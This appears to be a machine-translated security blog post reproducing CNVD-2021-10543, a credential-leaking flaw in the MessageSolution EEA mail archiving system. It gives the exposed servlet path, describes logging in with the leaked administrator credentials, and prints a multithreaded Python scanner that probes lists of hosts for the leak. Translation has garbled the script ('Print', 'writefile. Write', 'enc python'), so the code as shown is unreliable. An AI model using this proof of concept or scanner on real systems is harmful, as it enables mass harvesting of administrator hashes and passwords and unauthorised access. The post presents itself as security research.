MessageSolution EEA information leakage vulnerability of the mail archiving system
CNVD repetition – 2021-10543
A list,
EEA MessageSolution enterprise mail archiving management system EEA is a mail archiving system developed by Beijing Yishida Technology Development Co., LTD. General WEB information leakage occurs in the system, and the Administrator hash and WEB account password of the Windows server are leaked
Two, affect the product
MessageSolution Enterprise mail archiving management system EEA
Third, vulnerability recurrence
Visit page:
Poc path with vulnerability:
http://127.0.0.1/authenticationserverservlet/
Copy the codeAccess address password appears:
Log in to the system by obtaining the account password:
Detection process:
Write a simple detection script:
Script:
#! /usr/bin/enc python # _*_ coding: utf-8 _*_ import requests import os import sys import threading from multiprocessing.dummy import Pool from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) file = str(sys.argv[1]) write = sys.argv[2] readfile = open(file , 'r' , encoding='UTF-8') writefile = open(write , 'a') ff = readfile.readlines() def webhttp(): for line in ff: try: line = line.rstrip("\n") payload = "/authenticationserverservlet/" url = line + payload req = requests.get(url, verify=False, timeout=1) status = req.status_code print(req.text) if 'administrator' in req.text: Print (url + "-- -- -- -- -- -- -- -- -- -- -- -- -- loophole -- -- -- -- -- -- -- -- -- -- -- -- --") writefile. Write (url) writefile. Write (' \ n ') else: Print (url+" no bug ") pass except OSError: pass def main(): #f = threading.Thread(target=webhttp) pool = Pool(50) f = pool.apply_async(func=webhttp) pool.close() pool.join() readfile.close() writefile.close() if __name__=="__main__": main()Copy the codeReference:
Mp.weixin.qq.com/s/PQaOqCem2…
Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!
Disclaimer: Copyright belongs to the author. Commercial reprint please contact the author for authorization, non-commercial reprint please indicate the source.
Subscribe for more revisited articles and study notes
thelostworld
Safe road, side by side with you !!!!
Personal knowledge: www.zhihu.com/people/fu-w…
Brief personal book: www.jianshu.com/u/bf0e38a8d…
Personal CSDN: blog.csdn.net/qq\_3760279…
Personal blog garden: www.cnblogs.com/thelostworl…
FREEBUF homepage: www.freebuf.com/author/thel…
Language finches blog homepage: www.yuque.com/thelostworl…
